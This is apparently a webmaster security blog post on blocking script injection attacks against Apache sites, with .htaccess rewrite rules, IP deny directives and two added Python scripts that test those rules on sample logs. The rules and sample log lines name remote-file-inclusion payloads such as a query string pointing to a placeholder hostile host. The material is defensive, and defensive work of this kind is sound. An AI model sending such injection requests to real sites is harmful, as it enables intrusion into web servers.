My websites are all hosted on an Apache web server, owned by a commercial web hosting company. Apache is the most widely deployed web server on the planet. Others include Microsoft Windows IIS servers, FreeBSD, Mac Server, Java Servers, Tomcat and a variety of lesser servers. The biggest differences between these servers are in how one controls access to them. If your website is hosted on a Windows IIS Server, please contact your host or administrator for details on how to add unwanted IP addresses to the website's access control file.

In the case of dedicated, semi-dedicated, or VPS Apache type servers, running on Linux operating systems, anybody with "Root" access can install a firewall script such as "APF", which loads lists of IP addresses into "iptables" firewall rules. I happen to publish several blocklists in iptables format. One of those blocklists is the Iptables Exploited Servers Blocklist. By importing this file into the APF Firewall (your server administrator should know how to do this) you can deny all access to your server from other exploited servers. Ditto for the other blocklists I publish that contain Chinese, Korean, Russian and Nigerian IPs and CIDRs. Apply one or all of those blocklists and any IP covered by the ranges in the lists will be unable to access anything on your server. In fact, the server won't even respond to the requests. They go directly to the "bit bucket" (the request is sent to the null device, i.e. blackholed).

The above solution is only good for those who have total administrative control over a server. However, the majority of websites are hosted on "shared" servers, where numerous clients share the same operating system, hard drives, RAM and Database server. You (and I) have no control over the firewall that may or may not be in place to protect the server box you are hosted on. So, in order to control (deny) access to our individual websites we have to apply the access controls available to us as users. In the case of Apache servers these controls are applied via a special file named .htaccess. Note that the file name has no prefix; it begins with a period. Files beginning with a period have a special meaning to web servers and may be hidden by default by FTP programs and sometimes by web file managers. If your website has a .htaccess file, but you cannot see it when you login to your control panel, or FTP program, you will have to unhide it. In FTP programs this is done by inputting the "file mask" -al. If you use a file manager there may be a link to display hidden files on the server (ask your web host).

If you have access to and permission to customize your .htaccess file (most hosting companies allow this now), you can download the existing file from your web server to your hard drive, then open it in Notepad, or your html editor, or whatever plain text editor you have installed. The file will contain text that is either a comment or a "directive." All of the items listed in .htaccess files are typed in plain text, with no special characters. Comments are preceded by # signs and are not interpreted. Comments should be on their own lines and not appended to directives. Directives are interpreted and must adhere to a specific form recognized by your Apache server software. One mistake in your typing can cause the server to stop responding and yield the dreaded Server 500 error. If you neglect the leading # sign before a text comment it will cause a 500 error, as Apache does not understand your comments (only codes it knows about). Always save a backup of the last working .htaccess file before making any changes. You will need it every now and then!

With these things in mind, let's proceed to some actual .htaccess codes that will deny access to anybody who launches a script injection attack against your website.

One way to deny access is by copying the directives in one or more of my .htaccess blocklists and pasting them into your .htaccess file. Make sure you backup the previous file before saving the changed version. If you make a mistake, or your flavor of Apache doesn't like some of the codes, you will need to restore your old .htaccess immediately, from the backup file. There are a couple of ways to backup the existing file, including opening it in your text editor (Notepad is preferred) and Save As ".htaccess.txt" or similar, or renaming the existing file on the server to .htaccess1 (2, 3, etc), then upload the changed file. Go to one of your web pages immediately and ensure that it loads properly. If you get a 403 Forbidden message, or a Server 500 Error, undo the changes ASAP, by restoring the original file as .htaccess.

Alright, now that you know what to watch for in the errors department, here are some directives that will block not only IP addresses, but also bad behavior. The following directives are the ones I use to block script injection exploits, in my .htaccess file. Test these directives to ensure that they don't break any scripts you are using. Use them at your own risk, but be ready to restore your previous file if these directives cause a server hiccup!

# These rules need mod_rewrite; RewriteEngine On switches them on for this directory
RewriteEngine On

# Refuse requests from the libwww-perl user agent, a library used by many automated exploit scripts
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
RewriteRule .* - [F]

# Refuse requests that try to inject a remote file: DOCUMENT_ROOT or a URL in the query string,
# an encoded <script> path in the request URI, or a script tag in the referer
RewriteCond %{QUERY_STRING} DOCUMENT_ROOT [OR]
RewriteCond %{QUERY_STRING} .*=http.+ [NC,OR]
RewriteCond %{REQUEST_URI} %3C/scripts/.+\.php%3E [OR]
RewriteCond %{HTTP_REFERER} ^<script>window\.open.+$ [NC]
RewriteRule .* - [F]

Those are the safest all around directives I can publish in good conscience. There are other directives I use, but they might cause harm to some websites if they use the particular scripts that I block. The most important item in the above directives is the one that matches a QUERY_STRING containing (anything)=http(anything). That is how the majority of exploits are scripted. They are trying to upload a hostile file from another website into yours, via an unpatched, vulnerable html, php or asp extension page, or by breaking into an include file that is included in other files.
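As an added example (my own code, not the blog's or Apache's), here is a Python replay of the RewriteCond tests above against Apache combined-format log lines: it reports which rule would have answered 403 for each request and which source addresses trip the rules repeatedly, the way the 24-in-a-day pattern showed up in the post. The log lines are constructed samples using documentation addresses and a placeholder hostile host.

```python
"""Replay the .htaccess RewriteCond checks against Apache access log lines.

Added example, not code from the original post.  The log lines below are
constructed samples; only the first mirrors the shape of the entry quoted
in the post, with the hostile host replaced by a placeholder name."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

SAMPLE_LOG = [  # constructed; 203.0.113.x, 198.51.100.x and 192.0.2.x are documentation ranges
    '203.0.113.5 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=http://hostile.example/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Feb/2009:02:45:10 -0800] "GET /index.php?page=http://hostile.example/id2.txt HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Feb/2009:02:46:02 -0800] "GET /admin/?inc=DOCUMENT_ROOT HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Feb/2009:03:01:44 -0800] "GET /contact.html HTTP/1.1" 200 4096 "-" "libwww-perl/5.805"',
    '192.0.2.33 - - [01/Feb/2009:03:15:00 -0800] "GET /about.html HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"',
    '192.0.2.33 - - [01/Feb/2009:03:20:11 -0800] "GET /guestbook.php HTTP/1.1" 200 512 "<script>window.open(x)</script>" "Mozilla/4.0"',
]


# The same tests the RewriteCond lines express, as Python predicates.
# Each takes a parsed request and returns True when that rule would fire.
def ua_is_libwww_perl(req):              # RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
    return req["agent"].startswith("libwww-perl/")

def query_has_document_root(req):        # RewriteCond %{QUERY_STRING} DOCUMENT_ROOT
    return "DOCUMENT_ROOT" in req["query"]

def query_injects_url(req):              # RewriteCond %{QUERY_STRING} .*=http.+ [NC]
    return re.search(r"=http.+", req["query"], re.IGNORECASE) is not None

def uri_has_encoded_script_tag(req):     # RewriteCond %{REQUEST_URI} %3C/scripts/.+\.php%3E
    return re.search(r"%3C/scripts/.+\.php%3E", req["uri"]) is not None

def referer_opens_window(req):           # RewriteCond %{HTTP_REFERER} ^<script>window\.open.+$ [NC]
    return re.match(r"^<script>window\.open.+$", req["referer"], re.IGNORECASE) is not None

RULES = [ua_is_libwww_perl, query_has_document_root, query_injects_url,
         uri_has_encoded_script_tag, referer_opens_window]


def parse_line(line):
    """Split one combined-format log line into the fields the rules look at, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    parts = urlsplit(req["target"])
    req["uri"] = parts.path      # %{REQUEST_URI}: path only, left percent-encoded like mod_rewrite sees it
    req["query"] = parts.query   # %{QUERY_STRING}
    return req


def matched_rules(line):
    """Names of the rules that would have forbidden this request (empty list if none)."""
    req = parse_line(line)
    if req is None:
        return []
    return [rule.__name__ for rule in RULES if rule(req)]


def offenders(lines, threshold):
    """Source IPs with at least `threshold` rule-tripping requests, most active first."""
    hits = Counter()
    for line in lines:
        if matched_rules(line):
            hits[parse_line(line)["ip"]] += 1
    return [(ip, n) for ip, n in hits.most_common() if n >= threshold]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(line.split()[0], matched_rules(line) or "clean")
    print("repeat offenders:", offenders(SAMPLE_LOG, 2))
```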

As for the IP address that started this article, here is how to block it: Pay careful attention to the "order" directive format, or else (500)!

<Files *>
# <Files> needs a filename pattern; * applies these rules to every file
order deny,allow
deny from 212.241.182.240
# other IP addresses to "deny from" - like my exploited servers blocklist

# IP addresses to specifically allow, like the following example, just in case:
# Allow Google
allow from 64.68.80.0/21 64.233.160.0/19 66.249.64.0/19 72.14.192.0/18
</Files>

In the Files section shown above the "order" sequence dictates that "deny" items are processed first and "allow" items are processed last, with "allow" being the default action if nothing matches. Thus, if you do not specifically block an IP address it will be allowed by the "order deny,allow" directive, and because "allow" is processed last, an allowed address wins even if it also appears in a deny entry. The allowed items are only needed to be sure that those addresses are not blocked accidentally, when including a long blocklist of IP addresses and CIDR ranges. Note the space after the word "order" but no spaces within "deny,allow" - this is vitally important syntax!
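As an added example (not from the post), the following Python evaluator reads an order / deny from / allow from block like the one above and applies Apache's documented evaluation for both "deny,allow" and "allow,deny", so you can check what a long blocklist will do to a given client address before uploading it. The .htaccess text inside it is a constructed sample; the Google ranges are the ones quoted above, and the extra denied /24 is there only to show an allow entry overriding a deny entry.

```python
"""Evaluate an Apache 2.2-style order / deny from / allow from block.

Added example, not code from the original post or from Apache.  The
.htaccess fragment below is a constructed sample."""
import ipaddress

SAMPLE_HTACCESS = """\
<Files *>
order deny,allow
deny from 212.241.182.240
# a CIDR range inside Google's space, constructed to show that allow wins under deny,allow
deny from 66.249.64.0/24
# Allow Google
allow from 64.68.80.0/21 64.233.160.0/19 66.249.64.0/19 72.14.192.0/18
</Files>
"""


def parse_access_block(text):
    """Pull the order, deny and allow lists out of an .htaccess fragment.

    Comment lines (#) and the <Files> wrapper are skipped; each 'deny from' or
    'allow from' line may list several addresses or CIDR ranges, or 'all'.
    Any other directive raises, mirroring the 500 error a typo would cause.
    """
    order, deny, allow = "deny,allow", [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        words = line.split()
        key = words[0].lower()
        if key == "order" and len(words) == 2:
            order = words[1].lower()          # 'deny,allow' or 'allow,deny'
        elif key in ("deny", "allow") and len(words) > 2 and words[1].lower() == "from":
            (deny if key == "deny" else allow).extend(w.lower() for w in words[2:])
        else:
            raise ValueError("unrecognised directive: " + line)
    return order, deny, allow


def matches(client, entries):
    """True if the client address is covered by any entry (single IP, CIDR or 'all')."""
    ip = ipaddress.ip_address(client)
    for entry in entries:
        if entry == "all" or ip in ipaddress.ip_network(entry, strict=False):
            return True
    return False


def access_allowed(order, deny, allow, client):
    """Apply Apache's Order semantics and return True if the client gets in.

    deny,allow: deny entries first, allow entries last, default allow;
                an allow entry therefore overrides a matching deny entry.
    allow,deny: allow entries first, deny entries last, default deny;
                a deny entry therefore overrides a matching allow entry.
    """
    denied, allowed = matches(client, deny), matches(client, allow)
    if order == "deny,allow":
        return allowed or not denied
    if order == "allow,deny":
        return allowed and not denied
    raise ValueError("unknown order: " + order)


def decide(htaccess_text, client):
    """Parse the block and decide for one client address."""
    order, deny, allow = parse_access_block(htaccess_text)
    return access_allowed(order, deny, allow, client)


if __name__ == "__main__":
    for client in ("212.241.182.240", "66.249.64.10", "198.51.100.1"):
        print(client, "allowed" if decide(SAMPLE_HTACCESS, client) else "denied")
```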

All of my .htaccess blocklist pages have complete directives sections ready for you to drop in to your .htaccess file as is, or, take the deny from lines as you need them and paste them in where you want them to go. Always test before deploying changes to your Apache website's .htaccess file!



About the author

Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

I produce this blog and website at my own expense. If you find this information valuable please consider making a donation via PayPal.

Follow @Wizcrafts on Twitter, where I post short updates on security issues, spam trends and things that just eat at my craw.

Follow Wizcrafts on Twitter


Malwarebytes' Anti-Malware is the most frequently recommended malware removal tool in malware removal forums, like Bleeping Computers. It is extremely effective for removing fake/rogue security alerts, Bots, Spyware and the most prevalent and current malware threats in the wild. Learn about Malwarebytes Anti-Malware.


MailWasher Pro is an effective spam filter that protects your desktop email client. Using a combination of blacklists and built-in and user configurable filters, MailWasher Pro recognizes and deletes spam before you download it. MailWasher Pro reveals the actual URL of any links in a message, which protects you from most Phishing scams. Try it free for 30 days.





This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.